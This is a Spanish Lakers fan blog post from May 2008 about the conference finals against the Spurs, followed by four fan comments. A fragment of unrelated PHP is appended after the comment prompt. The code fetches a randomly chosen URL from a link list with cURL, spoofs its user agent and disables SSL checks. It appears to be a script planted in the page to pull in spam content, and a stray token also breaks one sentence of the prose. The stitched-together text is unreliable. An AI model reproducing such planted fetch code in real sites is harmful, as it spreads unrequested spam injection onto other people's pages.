Diario laker: No es lo mismo

29 de May de 2008 por MagicJohnson32

Pensamientos desde el 1.111 de South Figueroa Street, antiguo 3.900 de West Manchester Boulevard.

Desde las 3:00 horas de la próxima madrugada, televisado en directo y en abierto por Cuatro, los L.A. Lakers disponen de la primera oportunidad de sellar su pase a las Finales de la NBA. Echando la vista unos meses atrás, cuesta de creer. Sea cual sea el resultado final de esta temporada, pocas veces habremos disfrutado tanto los aficionados de los Lakers. Los años del Three-peat fueron fantásticos pero todo aquello carecía de sentido si no se ganaba. Era el Anillo o la miseria. Era Desfile de Campeones por las calles de L.A. o declaraciones cruzadas por la prensa de todo el país. Blanco o negro.

Esta plantilla, en cambio, permite una amplísima escala cromática. Permite medir con exactitud y perspectiva los logros o los fracasos. Y esto viene dado, en buena parte, por lateamsa propia dinámica interna del EQUIPO, donde cada jugador cuenta con un rol muy específico, que asume y con el que trata de cumplir de la mejor manera que sabe. No hay guerra de guerrillas, sino cenas de equipo para ver los partidos de las otras eliminatorias. No es lo mismo, y se nota.

Y voy a insistir en algo que comenté ayer: la media de edad de los 11 jugadores con peso real en el equipo y en el proyecto (es decir, excluyendo a Mihm, Karl, Mbenga y Newble) es de menos de 26 años. ¿Sabéis cuál es la edad media de los 11 jugadores de los Spurs con minutos en esta serie? 33 años. Celtics y Pistons, por su parte, tienen respectivamente 9 y 6 jugadores por encima de la treintena.

Aunque lo cierto es que esto ahora no importa lo más mínimo. Una situación de 3-1, con el factor cancha a favor, hay que rematarla. Por cierto, los Spurs no pierden una eliminatoria sin ganar al menos dos partidos desde la 2001-2002.

Contra los Lakers, claro.

Comenta

4 comentarios a esta entrada

  1. Gallis dice:
    #1

    Creo que Newtoniano no le va a gustar que saques a Newble de la lista de jugadores que soporten el proyecto, jeje…

    Bueno, es cierto que no es lo mismo, pero aquello fue precioso y lo bonito sería que esto fuera igual de precioso. La diferencia es, como apuntas, que ahora te pasan los Spurs por encima en estos 3 partidos y cuando recordemos esta temporada lo haremos con una sonrisa en la boca.

    Ya lo dije ayer, creo que esta noche ganamos medio fácil…pero es solo una sensación. En cuanto me acuerdo de quién está enfrente no puedo evitar pensar en el séptimo partido, jejejeje.

    Ah! en este sentido escribió J.A.Adande un artículo en ESPN hace unos días, hablando de los EuroLakers y las diferencias entre el equipo del three-peat y este. Altamente recomendable.

      Citar

  2. TheDeerHunter dice:
    #2

    Ayer evité hacer algún comentario aquí… porque me quedé con muy mal sabor de boca y con la mosca tras la oreja con la brillante idea de la NBA de hablar sólo parcialmente de las cosas… supongo que era cuestión de marketing para darle un poco más de morbo, si cabe, a la eliminatoria…
    Los árbitros a los leones, y aunque yo tenía mis dudas de cómo iban a reaccionar lo hicieron de la peor manera posible.

    Corriendo un tupido velo a ese escabroso asunto, sobre lo que decís, los Lakers de Shaq y Kobe transmitían un cierto mal rollo y su juego no enamoraba… a pesar de todo, me quedo con aquellos momentos en los que se convertían en una apisonadora… todo el partido tocándose los cataplines y dos arreones finiquitaban el partido.
    Al equipo actual lo veo con menos pegada, en el sentido de que Shaq aportaba mayor devastación desde donde se consiguen los éxitos. Sin embargo estos Lakers tienen un juego más bonito, con mucha y buena distribución, más solidaridad y mayor implicación de más gente. Además está Pau.

    Sin embargo, para nada estaba de acuerdo con que si nos remontaban 3 partidos Spurs ibamos a recordar este equipo con una sonrisa… Para mí es ahora o nunca. Quién sabe lo que nos tocará las próximas temporadas. Ni me importa en este momento… ahora sólo me importa saber en cuantos partidos ganaremos.

      Citar

  3. Gallis dice:
    #3

    Bueno, Deer, yo hablo por mí, y supongo que debo ser un bicho raro, pero es que eso de ganar a toda costa, todo o nada, etc, etc, no va conmigo…nunca he sido eso que se llama “un ganador”, jeje…

    Si los Spurs nos hubieran eliminado, yo me hubiera llevado un disgusto de la ostia, como me lo llevaré si perdemos la final…pero pasado el primer mal trago, yo a este mundo no he venido a sufrir y el recuerdo que hubiera guardado (y que guardaré, pase lo que pase en la final) de esta temporada es un recuerdo magnífico (como el que guardo, por ejemplo, del 91, un año en el que ni de coña pensaba que ibamos a jugar la final o del 96, solo por el hecho de volver a ver a Magic en una cancha)…ganar siempre es imposible, por eso si al final pierdo, con el tiempo, me vale con haberme divertido…

    Y en lo de que es ahora o nunca tampoco estoy de acuerdo. Es ahora. Punto. En eso estoy de acuerdo y en eso estamos centrados, pero en cuanto acabe la temporada, el después si me importa…y el después es magnífico, a años luz del nunca. Y si perdemos no me voy a lamer las heridas, lamentando la oportunidad perdida, sino que voy a mirar hacía adelante, soñando con una nueva oportunidad, como espero, y estoy seguro, que hará el equipo…o como, por ejemplo, hacen cada año par los Spurs, jeje…

      Citar

  4. TheDeerHunter dice:
    #4

    Buenas Gallis,
    yo no creo que saque los flagelos ni el cilicio si los Lakers perdieran esta final. Tampoco lo hubiera hecho si nos hubiera eliminado SA o Utah… creo que entraba perfectamente dentro de lo posible.
    Efectivamente me hubiera decepcionado… y poco más. No me quitaría el sueño… Está claro que en esta vida uno se acostumbra a las derrotas, tanto propias como afines.

    Dejando un poco de lado todas esas consideraciones tan profundas… LAKERS GO!!!! VAMOS A GANAR, COPOOOON!!! VAMOS A DARLES HASTA POR EL TREBOL!!! MUERTE AL FUCKING LEPRECHAUN!!!

    Ese ha sido mi consejo de hoy.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>